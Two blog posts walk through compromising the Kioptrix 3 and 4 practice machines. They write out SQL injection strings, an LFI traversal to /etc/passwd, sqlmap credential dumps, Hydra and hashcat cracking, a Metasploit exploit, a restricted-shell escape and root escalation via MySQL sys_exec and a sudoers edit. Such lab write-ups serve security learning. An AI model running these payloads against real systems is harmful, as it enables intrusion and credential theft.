Saturday, March 30, 2019

Kioptrix4

netdiscover -r 192.168.0.0/24
nmap -sS -sV -T4 -AO 192.168.0.4
nikto -host 192.168.0.4 -port 80 -output kioptrix4.html
 enum4linux -a 192.168.0.4 | tee e4l.txt  nmap --script smb-enum-users 192.168.0.4 -oA nmapenumusers.txt
  nmap --script smb-enum-shares 192.168.0.4 -oA nmapenumshares.txt
  dirb http://192.168.0.4 /usr/share/wordlists/dirb/common.txt | tee dirb.txt
  vi dirb.txt
Knowing that the directory of john existed, based on the results from dirb, I directly opened john/john.php in browser

 Using the manual process to determine if the web site was vulnerable to SQL Injection, I simply added a to the Username and Password fields and then clicked the Login button.
Interesting, I discovered that there was a MySQL database and that the page of checklogin.php was being utilized.
Next, I decided to use the discovered SMB usernames with the blah’ OR 1 = 1 — -
or 'OR'1'='1
SQLInjection within the Password field.
 
ssh john@192.168.0.3
the account has limited access on shell
 
Knowing that Python was usually installed on Ubuntu by default, I decided to play around with the following example from the SANS documentation:
python: exit_code = os.system(‘/bin/sh’) output = os.popen(‘/bin/sh’).read()
After some time, I issued the echo command with the Python OS module of System in order to call /bin/bash.
echo os.system('/bin/bash');
tried sudo su
but no luck
cat /var/www/checklogin.php
found root password of mysql that is null
checked mysql is running with root or with different crendential
ps ef | grep mysql     it was running with root
  MySQL had a module called UDF (User-Defined Function). So, I issued the locate udf command to see if the library was installed on the system.


mysql -u root
select * from mysql.func; 
select sys_exec('usermod -a -G admin  john');
exit
sudo su
boom...u have root!!

read cat /root/congrats.txts
Posted by at No comments:

Sunday, March 10, 2019

kioptrix3

netdiscover -r 192.168.0.0/24

nmap -sS -T4 -oA 192.168.0.3

nikto -host 192.168.0.3 -port 80 -output nikto.html

searchsploit  -w lotuscms

we found remote code execution, so we can run this using msf, netcat and directly.

msfconsole: search lotuscms

use exploit/multi/http/lcms_php_exec

RHOST = IP address of the kioptrix3
RPort = 80
URI = / (as found in nmap and nikto)
LPORT = local port used on the Kali system to communicate from the RHOST

run
and you will get the console and can open passwd file but not shadow file.

tried to access home directories of the users:
In reviewing the /home/dreg directory, there was nothing interesting to review. However, reviewing the /home/loneferret directory turned up some interesting information.
 we found a CompanyPolicy.README file and it shows that loneferret can use sudo ht.

Further inspection of the /home/www/kioptrix3.com/gallery/gconfig.php file appears to have hard coded root credentials for the gallery database i.e fucyeyou.

Next, I launched a browser and returned to the Kioptrix web page. system’s IP Address (http://192.168.0.3/phpmyadmin).

exploring the database application we found 3 databases:

gallery
Information_schema
mysql

The gallery database contains a table called dev_accounts and we found username and hash password in that table.

Seeing that the local website used PHP, I tried to determine if the PHP scripts had been sanitized. I added the ../../../../../etc/passwd directly after the = sign within the URL.

Unfortunately, I did not receive any results. So, I turned to the Internet to research for PHP LFI vulnerabilities. In reading the OWASP Testing for Local File Inclusion” guide, it was noted that a null-byte terminator may be needed to signify the end of a string.
So, I re-entered the ../../../../../etc/passwd and added jpg at the end of the string. I added the jpg after the string as a technique suggested within the OWASP article.

http://192.168.0.3/index.php?system=../../../../../etc/passwdhtml

the attacking system must have its /etc/hosts file updated with an entry for kioptrix3.com. Otherwise, reference to kioptrix3.com will attempt to connect to the Internet and the image files may not be displayed correctly.

 sqlmap -u http://192.168.0.3/gallery/index.php
   sqlmap -u http://192.168.0.3/gallery/recent.php
   sqlmap -u http://192.168.0.3/gallery/g.php/1

The above mentioned commands will not give the sufficient result, so tried further.

Using the below commands we found the username and passwords

     sqlmap -u http://192.168.0.3/gallery/gallery.php?id=1&sort=photoid#photos
    
     sqlmap -u http://192.168.0.3/gallery/gallery.php?id=1&sort=photoid#photos

     sqlmap -u http://192.168.0.3/gallery/gallery.php?id=--dbs
     sqlmap -u http://192.168.0.3/gallery/gallery.php?id=-D gallery --tables
     sqlmap -u http://192.168.0.3/gallery/gallery.php?id=--dbs
     sqlmap -u http://192.168.0.3/gallery/gallery.php?id= --dbs
     sqlmap -u http://192.168.0.3/gallery/gallery.php?id=-D gallery --tables
     sqlmap -u http://192.168.0.3/gallery/gallery.php?id=-D gallery -T dev-accounts
     sqlmap -u http://192.168.0.3/gallery/gallery.php?id=-D gallery -T dev-accounts --dump
     sqlmap -u http://192.168.0.3/gallery/gallery.php?id= -D gallery -T dev_accounts --dump
     sqlmap -u http://192.168.0.3/gallery/gallery.php?id= -D mysql -T user --dump
     sqlmap -u http://192.168.0.3/gallery/gallery.php?id= -D mysql -T user --dump -C 'host, user, password'
  

Having both usernames from /etc/passwdand now the usernames and hashes from phpMyAdmin, I had enough information to use a password cracker to recover the credentials. I decided to use Hydra and HashCat.

Method 1:

I created a text file named users and added the loneferret and dreg usernames to the file. I then launched Hydra to do a brute force crack against the Kioptrix system using the following parameters:
· -L = Login File
· -P = Password File
· ssh = port
· -e nsr = n: null password, s: login and pass, and r: reversed login
· -f = exit after login/password found
· -t 4 = parallel number of connected tasks

   hydra -L /root/users -P /usr/share/wordlists/fasttrack.txt 192.168.0.3 ssh -e nsr -f -t 4

hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt -o kioptrix3.txt --force

 ssh loneferret@192.168.0.3 and password starwars
sudo -l



Unfortunately, I ran into an error opening the terminal with xterm-256color. I did some research and determined that if the export TERM=xterm command was used, it would by-pass the xterm-256color error.
sudo ht

  open /etc/sudoers
 and carefully update sudoer file

add ,/bin/sh directly after /usr/local/bin/ht  after using comma

 save and exit

 and use
sudo /bin/sh

you have root access!!




Posted by at No comments:
Subscribe to: Posts (Atom)